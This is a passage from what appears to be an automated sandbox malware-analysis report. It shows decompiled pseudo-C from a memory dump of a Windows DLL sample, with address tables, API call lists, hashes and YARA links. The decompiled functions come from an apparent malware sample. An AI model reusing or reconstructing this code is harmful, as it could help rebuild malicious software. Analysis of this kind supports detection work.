								__eflags = _t54;
								if(_t54 != 0) {
									goto L30;
								}
								_t43 = E049774A5(); // executed
								__eflags = _t43;
								if(_t43 != 0) {
									__eflags = _v8;
									_t65 = _v12;
									if(_v8 != 0) {
										L29:
										_t44 = E04975461(_t61, _t65, _v8); // executed
										_t54 = _t44;
										goto L30;
									}
									__eflags = _t65;
									if(__eflags == 0) {
										goto L30;
									}
									_t54 = E04973FC2(__eflags,  &(_t65[4]));
									__eflags = _t54;
									if(_t54 == 0) {
										goto L30;
									}
									goto L29;
								}
								_t54 = 8;
							}
						}
					} else {
						_t66 = _v12;
						if(_t66 == 0) {
							L30:
							if(_v16 == 0 || _v16 == 1) {
								 *0x497d128();
							}
							goto L34;
						}
						_t67 =  &(_t66[4]);
						do {
						} while (E04975AB2(_t62, _t67, 0, 1) == 0x4c7);
					}
					goto L30;
				} else {
					_t54 = _t22;
					L34:
					return _t54;
				}
			}































                                                                                                                          0x0497520d
                                                                                                                          0x04975218
                                                                                                                          0x0497521b
                                                                                                                          0x0497521e
                                                                                                                          0x04975221
                                                                                                                          0x04975228
                                                                                                                          0x0497522a
                                                                                                                          0x04975236
                                                                                                                          0x04975238
                                                                                                                          0x04975238
                                                                                                                          0x04975241
                                                                                                                          0x04975247
                                                                                                                          0x0497524c
                                                                                                                          0x04975266
                                                                                                                          0x04975272
                                                                                                                          0x04975274
                                                                                                                          0x04975279
                                                                                                                          0x04975283
                                                                                                                          0x04975283
                                                                                                                          0x0497527b
                                                                                                                          0x0497527b
                                                                                                                          0x0497527b
                                                                                                                          0x0497527b
                                                                                                                          0x0497528a
                                                                                                                          0x04975297
                                                                                                                          0x0497529e
                                                                                                                          0x049752a3
                                                                                                                          0x049752a3
                                                                                                                          0x049752ab
                                                                                                                          0x049752ae
                                                                                                                          0x049752d4
                                                                                                                          0x049752e0
                                                                                                                          0x049752e5
                                                                                                                          0x049752ea
                                                                                                                          0x049752ec
                                                                                                                          0x04975318
                                                                                                                          0x0497531a
                                                                                                                          0x049752ee
                                                                                                                          0x049752f2
                                                                                                                          0x049752f7
                                                                                                                          0x049752fc
                                                                                                                          0x04975303
                                                                                                                          0x04975309
                                                                                                                          0x0497530e
                                                                                                                          0x04975314
                                                                                                                          0x0497531b
                                                                                                                          0x0497531d
                                                                                                                          0x0497531f
                                                                                                                          0x0497532e
                                                                                                                          0x04975334
                                                                                                                          0x04975339
                                                                                                                          0x0497533b
                                                                                                                          0x0497536b
                                                                                                                          0x0497536d
                                                                                                                          0x0497533d
                                                                                                                          0x0497533d
                                                                                                                          0x04975343
                                                                                                                          0x04975350
                                                                                                                          0x04975356
                                                                                                                          0x04975356
                                                                                                                          0x0497535e
                                                                                                                          0x04975367
                                                                                                                          0x0497536e
                                                                                                                          0x04975370
                                                                                                                          0x04975372
                                                                                                                          0x04975379
                                                                                                                          0x04975386
                                                                                                                          0x0497538b
                                                                                                                          0x04975390
                                                                                                                          0x04975392
                                                                                                                          0x04975394
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x04975396
                                                                                                                          0x0497539b
                                                                                                                          0x0497539d
                                                                                                                          0x049753a4
                                                                                                                          0x049753a8
                                                                                                                          0x049753ab
                                                                                                                          0x049753c0
                                                                                                                          0x049753c4
                                                                                                                          0x049753c9
                                                                                                                          0x00000000
                                                                                                                          0x049753c9
                                                                                                                          0x049753ad
                                                                                                                          0x049753af
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x049753ba
                                                                                                                          0x049753bc
                                                                                                                          0x049753be
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x049753be
                                                                                                                          0x049753a1
                                                                                                                          0x049753a1
                                                                                                                          0x04975372
                                                                                                                          0x049752b0
                                                                                                                          0x049752b0
                                                                                                                          0x049752b5
                                                                                                                          0x049753cb
                                                                                                                          0x049753cf
                                                                                                                          0x049753d7
                                                                                                                          0x049753d7
                                                                                                                          0x00000000
                                                                                                                          0x049753cf
                                                                                                                          0x049752bb
                                                                                                                          0x049752be
                                                                                                                          0x049752c8
                                                                                                                          0x049752cf
                                                                                                                          0x00000000
                                                                                                                          0x049753df
                                                                                                                          0x049753df
                                                                                                                          0x049753e3
                                                                                                                          0x049753e7
                                                                                                                          0x049753e7

                                                                                                                          APIs
                                                                                                                            • Part of subcall function 0497154A: GetModuleHandleA.KERNEL32(4C44544E,00000000,04975226,00000000,00000000), ref: 04971559
                                                                                                                          • CloseHandle.KERNEL32(?,?,?,4D283A53,?,?), ref: 049752A3
                                                                                                                            • Part of subcall function 049775F6: RtlAllocateHeap.NTDLL(00000000,00000000,04974F70), ref: 04977602
                                                                                                                          • memset.NTDLL ref: 049752F2
                                                                                                                          • RtlInitializeCriticalSection.NTDLL(06FF9570), ref: 04975303
                                                                                                                            • Part of subcall function 04973FC2: memset.NTDLL ref: 04973FD7
                                                                                                                            • Part of subcall function 04973FC2: lstrlenW.KERNEL32(00000000,00410025,00000005,?,00000000), ref: 04974019
                                                                                                                            • Part of subcall function 04973FC2: StrCmpNIW.SHLWAPI(00000000,00000000,00000000), ref: 04974024
                                                                                                                          • RtlAllocateHeap.NTDLL(00000000,00000043,00000060), ref: 0497532E
                                                                                                                          • wsprintfA.USER32 ref: 0497535E
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.942731260.0000000004971000.00000020.00020000.sdmp, Offset: 04970000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.942716356.0000000004970000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000005.00000002.942751568.000000000497C000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000005.00000002.942765529.000000000497D000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000005.00000002.942780831.000000000497F000.00000002.00020000.sdmp Download File
                                                                                                                          Similarity
                                                                                                                          • API ID: AllocateHandleHeapmemset$CloseCriticalInitializeModuleSectionlstrlenwsprintf
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 4246211962-0
                                                                                                                          • Opcode ID: 85b8e9346e93e8e7a8d27d2027958bb4b8d8284cc5749c02840402b33249259c
                                                                                                                          • Instruction ID: febed2c5b663c2781b7c7a9eddc9b4d70222da412cd96a437d1b6a31738835be
                                                                                                                          • Opcode Fuzzy Hash: 85b8e9346e93e8e7a8d27d2027958bb4b8d8284cc5749c02840402b33249259c
                                                                                                                          • Instruction Fuzzy Hash: 0F510471B04314FBEB60ABA0DC89B6E7BACEF04724F450575E601E7590E7B8BD458B90
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 049778E6, Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 145stringCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 22%
                                                                                                                          			E049778E6(signed int __eax, signed int _a4, signed int _a8) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				signed int _v20;
				intOrPtr _t81;
				char _t83;
				signed int _t90;
				signed int _t97;
				signed int _t99;
				char _t101;
				unsigned int _t102;
				intOrPtr _t103;
				char* _t107;
				signed int _t110;
				signed int _t113;
				signed int _t118;
				signed int _t122;
				intOrPtr _t124;

				_t102 = _a8;
				_t118 = 0;
				_v20 = __eax;
				_t122 = (_t102 >> 2) + 1;
				_v8 = 0;
				_a8 = 0;
				_t81 = E049775F6(_t122 << 2);
				_v16 = _t81;
				if(_t81 == 0) {
					_push(8);
					_pop(0);
					L37:
					return 0;
				}
				_t107 = _a4;
				_a4 = _t102;
				_t113 = 0;
				while(1) {
					_t83 =  *_t107;
					if(_t83 == 0) {
						break;
					}
					if(_t83 == 0xd || _t83 == 0xa) {
						if(_t118 != 0) {
							if(_t118 > _v8) {
								_v8 = _t118;
							}
							_a8 = _a8 + 1;
							_t118 = 0;
						}
						 *_t107 = 0;
						goto L16;
					} else {
						if(_t118 != 0) {
							L10:
							_t118 = _t118 + 1;
							L16:
							_t107 = _t107 + 1;
							_t15 =  &_a4;
							 *_t15 = _a4 - 1;
							if( *_t15 != 0) {
								continue;
							}
							break;
						}
						if(_t113 == _t122) {
							L21:
							if(_a8 <= 0x20) {
								_push(0xb);
								L34:
								_pop(0);
								L35:
								E04974AAB(_v16);
								goto L37;
							}
							_t24 = _v8 + 5; // 0xcdd8d2f8
							_t103 = E049775F6((_v8 + _t24) * _a8 + 4);
							if(_t103 == 0) {
								_push(8);
								goto L34;
							}
							_t90 = _a8;
							_a4 = _a4 & 0x00000000;
							_v8 = _v8 & 0x00000000;
							_t124 = _t103 + _t90 * 4;
							if(_t90 <= 0) {
								L31:
								 *0x497d2b0 = _t103;
								goto L35;
							}
							do {
								_t110 = 0x3c6ef35f + _v20 * 0x19660d;
								_v20 = 0x3c6ef35f + _t110 * 0x19660d;
								__imp__(_t124,  *((intOrPtr*)(_v16 + _t110 % _a8 * 4)));
								__imp__(_t124,  *((intOrPtr*)(_v16 + _v20 % _a8 * 4)));
								_v12 = _v12 & 0x00000000;
								if(_a4 <= 0) {
									goto L30;
								} else {
									goto L26;
								}
								while(1) {
									L26:
									_t99 = _v12;
									__imp__( *((intOrPtr*)(_t103 + _t99 * 4)), _t124); // executed
									if(_t99 == 0) {
										break;
									}
									_v12 = _v12 + 1;
									if(_v12 < _a4) {
										continue;
									}
									goto L30;
								}
								_v8 = _v8 - 1;
								L30:
								_t97 = _a4;
								_a4 = _a4 + 1;
								 *((intOrPtr*)(_t103 + _t97 * 4)) = _t124;
								__imp__(_t124);
								_v8 = _v8 + 1;
								_t124 = _t124 + _t97 + 1;
							} while (_v8 < _a8);
							goto L31;
						}
						 *((intOrPtr*)(_v16 + _t113 * 4)) = _t107;
						_t101 = _t83;
						if(_t83 - 0x61 <= 0x19) {
							_t101 = _t101 - 0x20;
						}
						 *_t107 = _t101;
						_t113 = _t113 + 1;
						goto L10;
					}
				}
				if(_t118 != 0) {
					if(_t118 > _v8) {
						_v8 = _t118;
					}
					_a8 = _a8 + 1;
				}
				goto L21;
			}





















                                                                                                                          0x049778ed
                                                                                                                          0x049778f4
                                                                                                                          0x049778f9
                                                                                                                          0x049778fc
                                                                                                                          0x04977903
                                                                                                                          0x04977906
                                                                                                                          0x04977909
                                                                                                                          0x0497790e
                                                                                                                          0x04977913
                                                                                                                          0x04977a67
                                                                                                                          0x04977a69
                                                                                                                          0x04977a6b
                                                                                                                          0x04977a70
                                                                                                                          0x04977a70
                                                                                                                          0x04977919
                                                                                                                          0x0497791c
                                                                                                                          0x0497791f
                                                                                                                          0x04977921
                                                                                                                          0x04977921
                                                                                                                          0x04977925
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x04977929
                                                                                                                          0x04977955
                                                                                                                          0x0497795a
                                                                                                                          0x0497795c
                                                                                                                          0x0497795c
                                                                                                                          0x0497795f
                                                                                                                          0x04977962
                                                                                                                          0x04977962
                                                                                                                          0x04977964
                                                                                                                          0x00000000
                                                                                                                          0x0497792f
                                                                                                                          0x04977931
                                                                                                                          0x04977950
                                                                                                                          0x04977950
                                                                                                                          0x04977967
                                                                                                                          0x04977967
                                                                                                                          0x04977968
                                                                                                                          0x04977968
                                                                                                                          0x0497796b
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x0497796b
                                                                                                                          0x04977935
                                                                                                                          0x0497797c
                                                                                                                          0x04977980
                                                                                                                          0x04977a5a
                                                                                                                          0x04977a5c
                                                                                                                          0x04977a5c
                                                                                                                          0x04977a5d
                                                                                                                          0x04977a60
                                                                                                                          0x00000000
                                                                                                                          0x04977a60
                                                                                                                          0x04977989
                                                                                                                          0x0497799a
                                                                                                                          0x0497799e
                                                                                                                          0x04977a56
                                                                                                                          0x00000000
                                                                                                                          0x04977a56
                                                                                                                          0x049779a4
                                                                                                                          0x049779a7
                                                                                                                          0x049779ab
                                                                                                                          0x049779af
                                                                                                                          0x049779b4
                                                                                                                          0x04977a4c
                                                                                                                          0x04977a4c
                                                                                                                          0x00000000
                                                                                                                          0x04977a52
                                                                                                                          0x049779bf
                                                                                                                          0x049779c8
                                                                                                                          0x049779dc
                                                                                                                          0x049779e3
                                                                                                                          0x049779f8
                                                                                                                          0x049779fe
                                                                                                                          0x04977a06
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x04977a08
                                                                                                                          0x04977a08
                                                                                                                          0x04977a08
                                                                                                                          0x04977a0f
                                                                                                                          0x04977a17
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x04977a19
                                                                                                                          0x04977a22
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x04977a24
                                                                                                                          0x04977a26
                                                                                                                          0x04977a29
                                                                                                                          0x04977a29
                                                                                                                          0x04977a2c
                                                                                                                          0x04977a30
                                                                                                                          0x04977a33
                                                                                                                          0x04977a39
                                                                                                                          0x04977a3c
                                                                                                                          0x04977a43
                                                                                                                          0x00000000
                                                                                                                          0x049779bf
                                                                                                                          0x0497793a
                                                                                                                          0x04977942
                                                                                                                          0x04977948
                                                                                                                          0x0497794a
                                                                                                                          0x0497794a
                                                                                                                          0x0497794d
                                                                                                                          0x0497794f
                                                                                                                          0x00000000
                                                                                                                          0x0497794f
                                                                                                                          0x04977929
                                                                                                                          0x0497796f
                                                                                                                          0x04977974
                                                                                                                          0x04977976
                                                                                                                          0x04977976
                                                                                                                          0x04977979
                                                                                                                          0x04977979
                                                                                                                          0x00000000

                                                                                                                          APIs
                                                                                                                            • Part of subcall function 049775F6: RtlAllocateHeap.NTDLL(00000000,00000000,04974F70), ref: 04977602
                                                                                                                          • lstrcpy.KERNEL32(69B25F45,00000020), ref: 049779E3
                                                                                                                          • lstrcat.KERNEL32(69B25F45,00000020), ref: 049779F8
                                                                                                                          • lstrcmp.KERNEL32(00000000,69B25F45), ref: 04977A0F
                                                                                                                          • lstrlen.KERNEL32(69B25F45), ref: 04977A33
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.942731260.0000000004971000.00000020.00020000.sdmp, Offset: 04970000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.942716356.0000000004970000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000005.00000002.942751568.000000000497C000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000005.00000002.942765529.000000000497D000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000005.00000002.942780831.000000000497F000.00000002.00020000.sdmp Download File
                                                                                                                          Similarity
                                                                                                                          • API ID: AllocateHeaplstrcatlstrcmplstrcpylstrlen
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3214092121-3916222277
                                                                                                                          • Opcode ID: 7a7e12bd26acc639178d845b200e5c228ae2d4a589a5f3cfb40dc6c1b8a250f4
                                                                                                                          • Instruction ID: 2df4f1974f7a2ce5498ebc96c21b4e03c26448f4dbf7d1b9e8a018cf4adccacd
                                                                                                                          • Opcode Fuzzy Hash: 7a7e12bd26acc639178d845b200e5c228ae2d4a589a5f3cfb40dc6c1b8a250f4
                                                                                                                          • Instruction Fuzzy Hash: 2151A135A01219EBDF15CFD9C544AADBBBAFF85354F0480BAE815AB202D770BB51CB80
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 04979311, Relevance: 6.0, APIs: 4, Instructions: 29sleepmemoryCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 50%
                                                                                                                          			E04979311(void** __esi) {
				intOrPtr _v0;
				intOrPtr _t4;
				intOrPtr _t6;
				void* _t8;
				void* _t9;
				intOrPtr _t10;
				void* _t11;
				void** _t13;

				_t13 = __esi;
				_t4 =  *0x497d364; // 0x6ff95b0
				__imp__(_t4 + 0x40);
				while(1) {
					_t6 =  *0x497d364; // 0x6ff95b0
					_t1 = _t6 + 0x58; // 0x0
					if( *_t1 == 0) {
						break;
					}
					Sleep(0xa);
				}
				_t8 =  *_t13;
				if(_t8 != 0 && _t8 != 0x497d030) {
					HeapFree( *0x497d270, 0, _t8);
				}
				_t9 = E04975141(_v0, _t13); // executed
				_t13[1] = _t9;
				_t10 =  *0x497d364; // 0x6ff95b0
				_t11 = _t10 + 0x40;
				__imp__(_t11);
				return _t11;
			}











                                                                                                                          0x04979311
                                                                                                                          0x04979311
                                                                                                                          0x0497931a
                                                                                                                          0x0497932a
                                                                                                                          0x0497932a
                                                                                                                          0x0497932f
                                                                                                                          0x04979334
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x04979324
                                                                                                                          0x04979324
                                                                                                                          0x04979336
                                                                                                                          0x0497933a
                                                                                                                          0x0497934c
                                                                                                                          0x0497934c
                                                                                                                          0x04979357
                                                                                                                          0x0497935c
                                                                                                                          0x0497935f
                                                                                                                          0x04979364
                                                                                                                          0x04979368
                                                                                                                          0x0497936e

                                                                                                                          APIs
                                                                                                                          • RtlEnterCriticalSection.NTDLL(06FF9570), ref: 0497931A
                                                                                                                          • Sleep.KERNEL32(0000000A,?,04975390), ref: 04979324
                                                                                                                          • HeapFree.KERNEL32(00000000,00000000,?,04975390), ref: 0497934C
                                                                                                                          • RtlLeaveCriticalSection.NTDLL(06FF9570), ref: 04979368
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.942731260.0000000004971000.00000020.00020000.sdmp, Offset: 04970000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.942716356.0000000004970000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000005.00000002.942751568.000000000497C000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000005.00000002.942765529.000000000497D000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000005.00000002.942780831.000000000497F000.00000002.00020000.sdmp Download File
                                                                                                                          Similarity
                                                                                                                          • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 58946197-0
                                                                                                                          • Opcode ID: 06ade767c23cd013921cf62eac7fe35ecb2d974b4825c758e2cd5bac31fa884c
                                                                                                                          • Instruction ID: 68c336b4097143f588400ed141a3c1b55b565a18e1f126d27bdbda6a65c444df
                                                                                                                          • Opcode Fuzzy Hash: 06ade767c23cd013921cf62eac7fe35ecb2d974b4825c758e2cd5bac31fa884c
                                                                                                                          • Instruction Fuzzy Hash: 85F0F8B1609240EBFB289F68ED48F1A3FE8FF15385B044538F652E72A0D628EC40CB55
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 04975141, Relevance: 4.6, APIs: 3, Instructions: 58COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 47%
                                                                                                                          			E04975141(char* _a4, char** _a8) {
				char* _t7;
				char* _t11;
				char* _t14;
				char* _t16;
				char* _t17;
				char _t18;
				signed int _t20;
				signed int _t22;

				_t16 = _a4;
				_push(0x20);
				_t20 = 1;
				_push(_t16);
				while(1) {
					_t7 = StrChrA();
					if(_t7 == 0) {
						break;
					}
					_t20 = _t20 + 1;
					_push(0x20);
					_push( &(_t7[1]));
				}
				_t11 = E049775F6(_t20 << 2);
				_a4 = _t11;
				if(_t11 != 0) {
					StrTrimA(_t16, 0x497c2a4); // executed
					_t22 = 0;
					do {
						_t14 = StrChrA(_t16, 0x20);
						if(_t14 != 0) {
							 *_t14 = 0;
							do {
								_t14 =  &(_t14[1]);
								_t18 =  *_t14;
							} while (_t18 == 0x20 || _t18 == 9);
						}
						_t17 = _a4;
						 *(_t17 + _t22 * 4) = _t16;
						_t22 = _t22 + 1;
						_t16 = _t14;
					} while (_t14 != 0);
					 *_a8 = _t17;
				}
				return 0;
			}











                                                                                                                          0x04975145
                                                                                                                          0x04975152
                                                                                                                          0x04975154
                                                                                                                          0x04975155
                                                                                                                          0x0497515d
                                                                                                                          0x0497515d
                                                                                                                          0x04975161
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x04975158
                                                                                                                          0x04975159
                                                                                                                          0x0497515c
                                                                                                                          0x0497515c
                                                                                                                          0x04975169
                                                                                                                          0x0497516e
                                                                                                                          0x04975173
                                                                                                                          0x0497517b
                                                                                                                          0x04975181
                                                                                                                          0x04975183
                                                                                                                          0x04975186
                                                                                                                          0x0497518a
                                                                                                                          0x0497518c
                                                                                                                          0x0497518f
                                                                                                                          0x0497518f
                                                                                                                          0x04975190
                                                                                                                          0x04975192
                                                                                                                          0x0497518f
                                                                                                                          0x0497519c
                                                                                                                          0x0497519f
                                                                                                                          0x049751a2
                                                                                                                          0x049751a3
                                                                                                                          0x049751a5
                                                                                                                          0x049751ac
                                                                                                                          0x049751ac
                                                                                                                          0x049751b8

                                                                                                                          APIs
                                                                                                                          • StrChrA.SHLWAPI(?,00000020,00000000,06FF95AC,04975390,?,0497935C,?,06FF95AC,?,04975390), ref: 0497515D
                                                                                                                          • StrTrimA.KERNELBASE(?,0497C2A4,00000002,?,0497935C,?,06FF95AC,?,04975390), ref: 0497517B
                                                                                                                          • StrChrA.SHLWAPI(?,00000020,?,0497935C,?,06FF95AC,?,04975390), ref: 04975186
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.942731260.0000000004971000.00000020.00020000.sdmp, Offset: 04970000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.942716356.0000000004970000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000005.00000002.942751568.000000000497C000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000005.00000002.942765529.000000000497D000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000005.00000002.942780831.000000000497F000.00000002.00020000.sdmp Download File
                                                                                                                          Similarity
                                                                                                                          • API ID: Trim
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3043112668-0
                                                                                                                          • Opcode ID: 028efadb254290d8713cc0ab4c08e7ee076b614c04c76620a623f7b4aea4226f
                                                                                                                          • Instruction ID: 12f7688d358a66dfaf0fcb8bd8c0b62fd4a54d2694fa6d32bc84e8cee8f4de71
                                                                                                                          • Opcode Fuzzy Hash: 028efadb254290d8713cc0ab4c08e7ee076b614c04c76620a623f7b4aea4226f
                                                                                                                          • Instruction Fuzzy Hash: 2101B1713043467FE7604A6A8C44F677B9EEFC53A9F051031BA55CB642E670F802C760
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 049718D8, Relevance: 3.0, APIs: 2, Instructions: 26COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			_entry_(intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _t4;
				void* _t10;
				void* _t11;
				void* _t12;
				void* _t14;

				_t14 = 1;
				_t4 = _a8;
				if(_t4 == 0) {
					if(InterlockedDecrement(0x497d274) == 0) {
						E04974450();
					}
				} else {
					if(_t4 == 1 && InterlockedIncrement(0x497d274) == 1) {
						_t10 = E0497262F(_t11, _t12, _a4); // executed
						if(_t10 != 0) {
							_t14 = 0;
						}
					}
				}
				return _t14;
			}








                                                                                                                          0x049718df
                                                                                                                          0x049718e0
                                                                                                                          0x049718e3
                                                                                                                          0x04971915
                                                                                                                          0x04971917
                                                                                                                          0x04971917
                                                                                                                          0x049718e5
                                                                                                                          0x049718e6
                                                                                                                          0x049718fb
                                                                                                                          0x04971902
                                                                                                                          0x04971904
                                                                                                                          0x04971904
                                                                                                                          0x04971902
                                                                                                                          0x049718e6
                                                                                                                          0x0497191f

                                                                                                                          APIs
                                                                                                                          • InterlockedIncrement.KERNEL32(0497D274), ref: 049718ED
                                                                                                                            • Part of subcall function 0497262F: HeapCreate.KERNELBASE(00000000,00400000,00000000,?,00000001,?,?,?,04971900,?), ref: 04972642
                                                                                                                          • InterlockedDecrement.KERNEL32(0497D274), ref: 0497190D
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.942731260.0000000004971000.00000020.00020000.sdmp, Offset: 04970000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.942716356.0000000004970000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000005.00000002.942751568.000000000497C000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000005.00000002.942765529.000000000497D000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000005.00000002.942780831.000000000497F000.00000002.00020000.sdmp Download File
                                                                                                                          Similarity
                                                                                                                          • API ID: Interlocked$CreateDecrementHeapIncrement
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3834848776-0
                                                                                                                          • Opcode ID: 0295d2884f8333e75c15249ae9d7ee1b6f729c2338187d0973fab522e28030cf
                                                                                                                          • Instruction ID: 0ecc955fc60e0bf427203ec9cb62c1b4cf352be1185f7f7672d5bcc9ecf043d8
                                                                                                                          • Opcode Fuzzy Hash: 0295d2884f8333e75c15249ae9d7ee1b6f729c2338187d0973fab522e28030cf
                                                                                                                          • Instruction Fuzzy Hash: BDE0DF39354122979F352A60A80A71BEA48AF80784F004630E580C112FD220E883A7D1
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 0497502E, Relevance: 2.6, APIs: 2, Instructions: 94memoryCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 87%
                                                                                                                          			E0497502E(void* __edx) {
				char _v8;
				char _v12;
				void* _v16;
				void* __edi;
				void* __esi;
				void* _t23;
				intOrPtr _t24;
				intOrPtr _t32;
				intOrPtr _t35;
				intOrPtr _t38;
				intOrPtr _t42;
				void* _t45;
				void* _t50;
				void* _t52;

				_t50 = __edx;
				_v12 = 0;
				_t23 = E049737AC(0,  &_v8); // executed
				if(_t23 != 0) {
					_v8 = 0;
				}
				_t24 =  *0x497d2e0; // 0x267a5a8
				_t4 = _t24 + 0x497edc8; // 0x6ff9370
				_t5 = _t24 + 0x497ed70; // 0x4f0053
				_t45 = E04974B28( &_v16, _v8, _t5, _t4);
				if(_t45 == 0) {
					 *0x497d104(_v16, 0,  &_v12);
					_t45 = 8;
					if(_v12 < _t45) {
						_t45 = 1;
						__eflags = 1;
					} else {
						_t32 =  *0x497d2e0; // 0x267a5a8
						_t11 = _t32 + 0x497edbc; // 0x6ff9364
						_t48 = _t11;
						_t12 = _t32 + 0x497ed70; // 0x4f0053
						_t52 = E0497131E(_t11, _t12, _t11);
						_t59 = _t52;
						if(_t52 != 0) {
							_t35 =  *0x497d2e0; // 0x267a5a8
							_t13 = _t35 + 0x497ee06; // 0x30314549
							if(E0497117A(_t48, _t50, _t59, _v8, _t52, _t13, 0x14) == 0) {
								_t61 =  *0x497d294 - 6;
								if( *0x497d294 <= 6) {
									_t42 =  *0x497d2e0; // 0x267a5a8
									_t15 = _t42 + 0x497ec12; // 0x52384549
									E0497117A(_t48, _t50, _t61, _v8, _t52, _t15, 0x13);
								}
							}
							_t38 =  *0x497d2e0; // 0x267a5a8
							_t17 = _t38 + 0x497ee00; // 0x6ff93a8
							_t18 = _t38 + 0x497edd8; // 0x680043
							_t45 = E04975DDA(_v8, 0x80000001, _t52, _t18, _t17);
							HeapFree( *0x497d270, 0, _t52);
						}
					}
					HeapFree( *0x497d270, 0, _v16);
				}
				_t54 = _v8;
				if(_v8 != 0) {
					E049751BB(_t54);
				}
				return _t45;
			}

















                                                                                                                          0x0497502e
                                                                                                                          0x0497503e
                                                                                                                          0x04975041
                                                                                                                          0x04975048
                                                                                                                          0x0497504a
                                                                                                                          0x0497504a
                                                                                                                          0x0497504d
                                                                                                                          0x04975052
                                                                                                                          0x04975059
                                                                                                                          0x0497506b
                                                                                                                          0x0497506f
                                                                                                                          0x0497507d
                                                                                                                          0x0497508b
                                                                                                                          0x0497508f
                                                                                                                          0x04975120
                                                                                                                          0x04975120
                                                                                                                          0x04975095
                                                                                                                          0x04975095
                                                                                                                          0x0497509a
                                                                                                                          0x0497509a
                                                                                                                          0x049750a1
                                                                                                                          0x049750ad
                                                                                                                          0x049750af
                                                                                                                          0x049750b1
                                                                                                                          0x049750b3
                                                                                                                          0x049750ba
                                                                                                                          0x049750cc
                                                                                                                          0x049750ce
                                                                                                                          0x049750d5
                                                                                                                          0x049750d7
                                                                                                                          0x049750de
                                                                                                                          0x049750e9
                                                                                                                          0x049750e9
                                                                                                                          0x049750d5
                                                                                                                          0x049750ee
                                                                                                                          0x049750f3
                                                                                                                          0x049750fa
                                                                                                                          0x04975118
                                                                                                                          0x0497511a
                                                                                                                          0x0497511a
                                                                                                                          0x049750b1
                                                                                                                          0x0497512c
                                                                                                                          0x0497512c
                                                                                                                          0x0497512e
                                                                                                                          0x04975133
                                                                                                                          0x04975135
                                                                                                                          0x04975135
                                                                                                                          0x04975140

                                                                                                                          APIs
                                                                                                                          • HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,06FF93A8,?,00000000,30314549,00000014,004F0053,06FF9364), ref: 0497511A
                                                                                                                          • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,049754EF), ref: 0497512C
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.942731260.0000000004971000.00000020.00020000.sdmp, Offset: 04970000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.942716356.0000000004970000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000005.00000002.942751568.000000000497C000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000005.00000002.942765529.000000000497D000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000005.00000002.942780831.000000000497F000.00000002.00020000.sdmp Download File
                                                                                                                          Similarity
                                                                                                                          • API ID: FreeHeap
